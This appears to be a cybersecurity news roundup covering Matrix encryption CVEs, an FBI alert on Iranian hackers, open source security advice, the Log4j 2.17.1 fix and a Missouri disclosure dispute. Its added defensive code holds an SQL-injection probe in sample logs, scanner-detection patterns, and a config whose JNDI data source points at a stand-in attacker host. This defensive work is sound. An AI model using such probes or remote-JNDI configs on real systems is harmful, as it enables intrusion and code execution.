
A Matrix Update Patches Serious End-to-End Encryption Flaws

The open source Matrix messaging protocol recently published a security advisory about two critical-severity vulnerabilities in the end-to-end encryption implemented by its software development kits (SDKs).

According to the advisory, an attacker who exploits these vulnerabilities could break the confidentiality of Matrix communications and, together with a malicious or compromised homeserver, carry out man-in-the-middle attacks that expose message contents in readable form.

Clients built on matrix-js-sdk, matrix-android-sdk2, and matrix-ios-sdk, such as Element, Cinny, SchildiChat, Beeper, Circuli, and Synod.im, are affected. Clients that use a different encryption implementation (Hydrogen, Nheko, ElementX, FluffyChat, Timmy, Syphon, Gomuks, and Pantalaimon) are not affected.

The vulnerabilities were reported to Matrix by researchers from Brave Software, the University of Sheffield, and Royal Holloway, University of London, who published the technical details of their findings.

CVEs assigned to the flaws discovered by the team

  • CVE-2022-39250: Key/Device identifier confusion in SAS verification on matrix-js-sdk, enabling a malicious server administrator to break emoji-based verification when cross-signing is used, authenticating themselves instead of the target user.
  • CVE-2022-39251: Protocol-confusion bug in matrix-js-sdk, leading to incorrectly accepting messages from a spoofed sender, possibly impersonating a trusted sender. The same flaw makes it possible for malicious homeserver admins to add backup keys to the target's account.
  • CVE-2022-39248: Same as CVE-2022-39251 but impacting matrix-android-sdk2 (Android clients).
  • CVE-2022-39255: Same as CVE-2022-39251 but impacting matrix-ios-sdk (iOS clients).
  • CVE-2022-39249: Semi-trusted impersonation problem in matrix-js-sdk leading to accepting keys forwarded without request, making impersonation of other users in the server possible. Clients mark these messages as suspicious on the recipient's end, thus dropping the severity of the bug.
  • CVE-2022-39246: Same as CVE-2022-39249 but impacting matrix-android-sdk2 (Android clients).
  • CVE-2022-39257: Same as CVE-2022-39249 but impacting matrix-ios-sdk (iOS clients).

The first two entries, together with their Android and iOS counterparts, are the critical-severity issues; the semi-trusted impersonation bugs are rated lower because clients flag the affected messages. The paper also describes two issues that had not yet received CVE identifiers: one concerning the trust a client must place in its homeserver, which controls room membership and device lists, and one concerning the use of AES-CTR.
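As an added illustration (not matrix-js-sdk code) of the two checks behind the protocol-confusion and semi-trusted impersonation fixes: to-device events must be Olm-encrypted, never Megolm, and the decrypted Olm payload must be bound to the envelope's sender and to the receiving user's own ID and Ed25519 key; forwarded Megolm keys are accepted only against an outstanding request. Olm decryption is simulated with a constructed lookup table, and every user ID, key and class name below is made up for the example.

```javascript
// Added example, not matrix-js-sdk code: the sender/algorithm checks a Matrix
// client must apply to incoming to-device traffic. Olm decryption is simulated
// with a constructed lookup table (FAKE_OLM) because the point is the validation,
// not the cipher. All identifiers below are constructed.
const OLM = "m.olm.v1.curve25519-aes-sha2";
const MEGOLM = "m.megolm.v1.aes-sha2";

class ToDeviceGuard {
  constructor(ownUserId, ownEd25519, decryptOlm) {
    this.ownUserId = ownUserId;
    this.ownEd25519 = ownEd25519;
    this.decryptOlm = decryptOlm;          // (senderCurve25519, ciphertext) -> plaintext object or null
    this.pendingKeyRequests = new Set();   // "roomId|sessionId" of m.room_key_request we sent
  }

  // CVE-2022-39251 class of bug: to-device messages are only ever Olm-encrypted.
  // A client that also accepts Megolm here lets a homeserver attach attacker
  // content to another user's identity.
  acceptEncrypted(event) {
    if (event.type !== "m.room.encrypted") return { ok: false, reason: "not encrypted" };
    const c = event.content;
    if (c.algorithm !== OLM) return { ok: false, reason: `to-device must use Olm, got ${c.algorithm}` };
    const plain = this.decryptOlm(c.sender_key, c.ciphertext);
    if (!plain) return { ok: false, reason: "olm decryption failed" };
    // Bind the authenticated Olm plaintext to the unauthenticated envelope.
    if (plain.sender !== event.sender) return { ok: false, reason: "sender mismatch" };
    if (plain.recipient !== this.ownUserId) return { ok: false, reason: "recipient mismatch" };
    if (!plain.recipient_keys || plain.recipient_keys.ed25519 !== this.ownEd25519) {
      return { ok: false, reason: "recipient key mismatch" };
    }
    return { ok: true, type: plain.type, content: plain.content, senderKey: c.sender_key };
  }

  recordKeyRequest(roomId, sessionId) {
    this.pendingKeyRequests.add(`${roomId}|${sessionId}`);
  }

  // CVE-2022-39249 class of bug: a forwarded Megolm key is acceptable only if we
  // asked for it, and even then it is merely semi-trusted.
  acceptForwardedRoomKey(decrypted) {
    if (decrypted.type !== "m.forwarded_room_key") return { ok: false, reason: "wrong type" };
    const id = `${decrypted.content.room_id}|${decrypted.content.session_id}`;
    if (!this.pendingKeyRequests.has(id)) return { ok: false, reason: "unsolicited forwarded key" };
    this.pendingKeyRequests.delete(id);
    return { ok: true, trust: "semi-trusted" };
  }
}

// Constructed sample data: Bob receives traffic that the server claims is from Alice.
const ALICE = "@alice:example.org";
const BOB = "@bob:example.org";
const MALLORY = "@mallory:example.org";
const ROOM = "!room:example.org";
const BOB_ED25519 = "BobEd25519Key";
const FAKE_OLM = {
  "ct-alice": { type: "m.room_key", sender: ALICE, recipient: BOB,
    recipient_keys: { ed25519: BOB_ED25519 },
    content: { algorithm: MEGOLM, room_id: ROOM, session_id: "s1", session_key: "constructed" } },
  "ct-mallory": { type: "m.room_key", sender: MALLORY, recipient: BOB,
    recipient_keys: { ed25519: BOB_ED25519 },
    content: { algorithm: MEGOLM, room_id: ROOM, session_id: "s9", session_key: "constructed" } },
};

function runScenarios() {
  const guard = new ToDeviceGuard(BOB, BOB_ED25519, (_senderKey, ct) => FAKE_OLM[ct] || null);
  const envelope = (algorithm, senderKey, ct) => ({
    type: "m.room.encrypted", sender: ALICE,
    content: { algorithm, sender_key: senderKey, ciphertext: ct },
  });
  const results = {};
  results.legit = guard.acceptEncrypted(envelope(OLM, "AliceCurve25519Key", "ct-alice"));
  // Protocol confusion: the server relays a Megolm payload as a to-device event.
  results.megolm = guard.acceptEncrypted(envelope(MEGOLM, "AliceCurve25519Key", "ct-alice"));
  // Spoofed envelope: the server labels Mallory's Olm message as coming from Alice.
  results.spoofed = guard.acceptEncrypted(envelope(OLM, "MalloryCurve25519Key", "ct-mallory"));
  const fwd = { type: "m.forwarded_room_key", content: { room_id: ROOM, session_id: "s2" } };
  results.unsolicited = guard.acceptForwardedRoomKey(fwd);
  guard.recordKeyRequest(ROOM, "s2");
  results.solicited = guard.acceptForwardedRoomKey(fwd);
  return results;
}
```

The envelope fields (`sender`, `algorithm`, `sender_key`) are written by the homeserver and are therefore attacker-controlled in the threat model of the advisory; only the fields inside the Olm plaintext are authenticated, which is why every envelope claim is cross-checked against them before the payload is used.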

FBI Issued a Warning to U.S Firms Concerning Iranian Hackers


The FBI has issued a warning that the Iranian hackers who posed as the far-right Proud Boys during the 2020 presidential election have broadened their operations, launching cyberattacks against a variety of industry sectors and spreading propaganda hostile to Saudi Arabia.

"Over time, as Iranian operators have evolved both their strategic priorities and tradecraft, the hackers have matured into more proficient malicious attackers capable of performing a whole spectrum of operations," read a Microsoft report.

Ransomware works by encrypting a device's data and making it inaccessible until the hacker receives a ransom payment. 

In a recent alert, the FBI stated that in addition to its election-related operation, the Emennet group has engaged in "conventional cyber exploitation activity" targeting sectors such as news, transportation, tourism, oil and petrochemicals, telecommunications, and financial services. The group used VPN services to obscure the origin of its attacks and focused on websites running particular software, such as WordPress, in the United States, Europe, and the Middle East.

During the discovery phase the group used a mix of open source and commercial tools, including SQLmap, Acunetix, DefenseCode, Wappalyzer, Dnsdumpster, Netsparker, wpscan, and Shodan, and picked potential victims by browsing the web for prominent companies in various sectors. For initial access it looked for vulnerabilities in the web software those targets were running.

"In certain cases, the goal may have been to target a large assortment of networks/websites inside a specific sector rather than a specific target company. Emennet would also attempt to discover hosting/shared hosting services in other scenarios," according to the FBI. 
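A small triage script for the discovery-phase activity described above, added here as an example and not part of the FBI notice. It parses combined-format web server access logs (the lines below are constructed), scores each source IP for scanner user-agents, WordPress reconnaissance paths and SQL-injection probes, and returns the IPs worth a closer look. The user-agent strings matched are the defaults the named tools send; an operator can change them, so a clean result is not proof of absence.

```javascript
// Added example, not from the FBI notice: score web access-log lines for the
// scanner-driven reconnaissance and injection probing described in the alert.
// Log lines, IPs and paths are constructed; the detection patterns are assumptions.
const SCANNER_UA = /sqlmap|wpscan|acunetix|netsparker/i;               // default tool UAs
const RECON_PATH = /^\/(wp-login\.php|xmlrpc\.php|wp-content\/plugins\/|readme\.html)/i;
const SQLI = /(\bunion\b[\s\S]*\bselect\b|'\s*or\s+'?\d|\bsleep\s*\()/i;
// Combined Log Format: ip ident user [time] "METHOD target proto" status bytes "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, ip, ts, method, target, status, ua] = m;
  const q = target.indexOf("?");
  const path = q === -1 ? target : target.slice(0, q);
  let query = q === -1 ? "" : target.slice(q + 1);
  try { query = decodeURIComponent(query.replace(/\+/g, " ")); } catch (e) { /* keep raw */ }
  return { ip, ts, method, path, query, status: Number(status), ua };
}

// Each finding carries a weight; a single scanner UA or injection probe is
// enough on its own, while one login-page hit is normal admin traffic.
function scoreRequest(r) {
  const reasons = [];
  if (SCANNER_UA.test(r.ua)) reasons.push(["scanner user-agent", 3]);
  if (SQLI.test(r.query)) reasons.push(["sql injection probe", 3]);
  if (RECON_PATH.test(r.path)) reasons.push(["wordpress recon path", 1]);
  return reasons;
}

function triage(lines, threshold = 3) {
  const perIp = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r) continue;
    const e = perIp.get(r.ip) || { ip: r.ip, score: 0, requests: 0, reasons: new Set() };
    e.requests += 1;
    for (const [why, pts] of scoreRequest(r)) { e.score += pts; e.reasons.add(why); }
    perIp.set(r.ip, e);
  }
  return [...perIp.values()]
    .filter((e) => e.score >= threshold)
    .sort((a, b) => b.score - a.score)
    .map((e) => ({ ...e, reasons: [...e.reasons] }));
}

// Constructed sample: one WPScan run, one sqlmap probe, one ordinary admin login.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Nov/2021:08:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1412 "-" "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"',
  '203.0.113.7 - - [10/Nov/2021:08:01:03 +0000] "GET /wp-content/plugins/some-plugin/readme.txt HTTP/1.1" 404 210 "-" "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"',
  '198.51.100.4 - - [10/Nov/2021:08:02:10 +0000] "GET /news.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 0 "-" "sqlmap/1.5.11#stable (https://sqlmap.org)"',
  '192.0.2.9 - - [10/Nov/2021:08:03:00 +0000] "GET /about.html HTTP/1.1" 200 5120 "https://example.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/94.0"',
  '192.0.2.9 - - [10/Nov/2021:08:03:05 +0000] "GET /wp-login.php HTTP/1.1" 200 1412 "https://example.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/94.0"',
];
```

Run `triage(SAMPLE_LOG)` to get the two scanning IPs back with their reasons; the admin at 192.0.2.9 stays below the threshold. In production the same scoring runs per IP over a time window, and the threshold is tuned against a baseline of the site's own legitimate traffic.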

The FBI recommends that users keep anti-virus and anti-malware products up to date, patch outdated software, and use reputable web hosting providers. In any case, Iran's state-sponsored hacking groups are not the only ones who have exploited the BIG-IP flaw.

Linux Foundation Expert Advises on Open Source Deployment and Fighting Vulnerabilities


The preliminary findings of the Census II study strongly suggest that open source projects need supporting toolsets, infrastructure, people, and good governance in order to function as stable and healthy upstream projects for your company.

The Linux Foundation's David A. Wheeler cited a report from Synopsys, a software security and IoT (Internet of Things) company: each application contains an average of 528 open source components, 84% of codebases have at least one vulnerability, and the average number of vulnerabilities per codebase is 158. The audit covered 1,546 codebases, with a codebase defined as "the code and accompanying libraries that make up an application or service." That is not as bad as it sounds, because not every flaw can be exploited. "If you're concerned about security, you'll inspect the software." Open source is nonetheless arguably safer, because of the long-standing secure design principle of open design, that "the mechanisms should not depend on the ignorance of potential attackers," set out in the 1974 paper by Jerome Saltzer and Michael Schroeder.

That is a benefit of open source software. "The many eyes theory works," Wheeler added. A big part of the problem is that vulnerable software does not get updated: many applications and systems do not update all of the components they use. This is also true of closed source, but "open source software is used a lot more."

Developers should "learn how to develop and acquire secure software," according to the report, which lists a number of free courses, best practices, and tools. One weakness of test-driven development, Wheeler said, is that the model of writing a test and then writing the code that makes it pass does not include negative tests: there is a need to test that things which should not happen do not happen. Missing negative tests is one of the major gaps in many test suites today, and it is how the Apple "goto fail" vulnerability slipped through. Be careful with software that has not been used in a long time: "There will very likely be no reviewers if there are no users. It's not a problem if you don't use it." If it is still required, the remedy is to "look at it yourself."

In summary, although the problem is difficult, several initiatives can help: the SPDX project, which specifies the software "bill of materials" of a library or application, and the Open Source Security Foundation (OpenSSF) security metrics dashboard, which, though still in its early stages, helps developers and users assess the security of specific packages.

Log4j 2.17.1 Is Out, And Fixes Yet Another Code Execution Flaw.


Apache has published Log4j version 2.17.1, which fixes CVE-2021-44832, a newly found code execution flaw. Until then the most recent version, 2.17.0, was considered the safe release to update to; that advice has since changed, and Log4j vulnerability resource pages now track downloads of 2.17.1.

Checkmarx researchers disclosed the vulnerability in Log4j 2.17.0, which Apache had released only days after two other patches addressing the Log4Shell attack and related problems. An attacker able to alter the Log4j logging configuration file can execute code remotely on affected servers or applications. Log4Shell itself is one of the most widely known security weaknesses on the internet, affecting enterprise and government users running Log4j versions 2.0 through 2.14.1.

Last month a security researcher discovered yet another vulnerability in the Apache Log4j Java-based logging library that threat actors could use to execute malicious code on affected systems. This week Apache released another version, Log4j 2.17.1, to fix the remote code execution (RCE) flaw in 2.17.0.

Log4j is a well-known open-source Java library maintained by the Apache Software Foundation. Developers use it to log error messages in large commercial systems and cloud services such as Minecraft, Steam, and Apple iCloud.

Apache acknowledged the issue in an advisory that describes the moderate-severity flaw (CVSS 6.6) as follows: Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, which can execute remote code.

The new Log4j CVE "only applies if an attacker can already edit the Log4j config file," according to security researcher Kevin Beaumont. "An attacker already owns your web app or host if they can edit your Log4j config file."
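Two checks a defender can script across a fleet after this advisory, added here as an example (not Apache's or Checkmarx's code): one encodes the advisory's affected-version range so inventory data can be matched against it, and one scans a log4j2.xml for the JDBC Appender data source the advisory describes, flagging any JNDI name outside the local `java:` namespace as remote. The configurations and the hostname `attacker.invalid` are constructed.

```javascript
// Added example, not Apache's or Checkmarx's code: two checks a defender can
// script across a fleet after CVE-2021-44832. isAffectedVersion() encodes the
// version range in Apache's advisory; findJndiDataSources() flags the JDBC
// Appender configuration the advisory describes. The sample configs are constructed.
const EXCLUDED_FIX_RELEASES = new Set(["2.3.2", "2.12.4"]);

function parseVersion(v) {
  const m = /^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$/i.exec(v.trim());
  if (!m) return null;
  return {
    nums: [Number(m[1]), Number(m[2]), Number(m[3] || 0)],
    pre: m[4] ? { kind: m[4].toLowerCase(), n: Number(m[5]) } : null,
  };
}

function cmp(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// Affected: 2.0-beta7 through 2.17.0, excluding the 2.3.2 and 2.12.4 fix releases.
function isAffectedVersion(v) {
  const p = parseVersion(v);
  if (!p || p.nums[0] !== 2) return false;               // 1.x is out of scope here
  if (cmp(p.nums, [2, 17, 0]) > 0) return false;         // 2.17.1 and later are fixed
  if (cmp(p.nums, [2, 0, 0]) === 0 && p.pre && p.pre.kind === "beta" && p.pre.n < 7) {
    return false;                                        // earlier than 2.0-beta7
  }
  return !EXCLUDED_FIX_RELEASES.has(p.nums.join("."));
}

// Flag every <DataSource jndiName="..."> in a log4j2.xml. A JNDI name outside the
// local "java:" namespace points at a remote directory service.
function findJndiDataSources(xml) {
  const found = [];
  const tag = /<DataSource\b([^>]*)>/gi;
  let m;
  while ((m = tag.exec(xml)) !== null) {
    const attr = /\bjndiName\s*=\s*"([^"]*)"/i.exec(m[1]);
    if (attr) found.push({ jndiName: attr[1], remote: !/^java:/i.test(attr[1]) });
  }
  return found;
}

// Constructed configurations.
const LOCAL_DATASOURCE_CONFIG = `
<Configuration>
  <Appenders>
    <JDBC name="db" tableName="logs">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource" />
      <Column name="message" pattern="%m" />
    </JDBC>
  </Appenders>
</Configuration>`;

// The shape the advisory describes: the data source resolved over JNDI from a host the
// config author controls. Only someone who can already write the config can plant this.
const REMOTE_DATASOURCE_CONFIG = LOCAL_DATASOURCE_CONFIG.replace(
  'jndiName="java:comp/env/jdbc/LoggingDataSource"',
  'jndiName="ldap://attacker.invalid/datasource"');

const FILE_ONLY_CONFIG = `
<Configuration>
  <Appenders>
    <File name="f" fileName="app.log"><PatternLayout pattern="%m%n"/></File>
  </Appenders>
</Configuration>`;
```

Version matching alone is not a finding: as Beaumont notes, the bug needs write access to the configuration, so the useful signal is a JNDI data source in a config that nobody expects to have one. Log4j 2.17.1 additionally disables JNDI data sources in the JDBC Appender unless they are explicitly re-enabled with a system property, which is the setting to verify on upgraded hosts.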

One of the most important lessons from the events surrounding Log4j is that it is humanly impossible for open source maintainers to cover every possible attack vector while also fixing known vulnerabilities. That is why community-led vulnerability research and reporting benefits open source. Done badly, however, it quickly becomes a burden.

"Irresponsible disclosures jeopardize the work of open source projects and their maintainers, and if not handled, this problem will only get worse." 

Another point worth noting: unlike the previous four Log4j CVEs, nobody is credited with identifying CVE-2021-44832 in Apache's official advisory.

Missouri Gov. Calls Journalist Who Found Cyber Flaw on Website a “Hacker”


Earlier this month, St. Louis Post-Dispatch reporter Josh Renaud found a flaw on the website of the Missouri Department of Elementary and Secondary Education that exposed the Social Security numbers and personal details of thousands of administrators, public school teachers, and other education personnel.

Two weeks after the newspaper identified the flaw, Gov. Mike Parson's administration hired a third-party cybersecurity firm to investigate and monitor the incident.

Last week the Missouri state government signed a contract with Identity Theft Guard Solutions, also known as ID Experts, a company that provides data breach response and credit monitoring services. The matter came to light when the St. Louis Post-Dispatch discovered, during its own investigation, that the Social Security numbers of 100,000 Missouri teachers were potentially exposed.

The contract does not state that ID Experts will examine that flaw, but it does specify that notifying the teachers of the potential breach and providing them with credit monitoring will cost state taxpayers around $4.5 million.

In the wake of the incident, instead of thanking the journalist, the Missouri government threatened legal action against the St. Louis Post-Dispatch journalist who discovered the flaw, calling him a "hacker" and describing the newspaper's reporting as nothing more than a "political vendetta" and "an attempt to embarrass the state and sell headlines for their news outlet." The Republican governor also vowed to hold the newspaper "accountable".

“This matter is serious. The state is committing to bringing to justice anyone who hacked our system and anyone who aided or encouraged them to do so — in accordance with what Missouri law allows AND requires. A hacker is someone who gains unauthorized access to information or content. This individual did not have permission to do what they did. They had no authorization to convert and decode the code,’’ Parson later tweeted.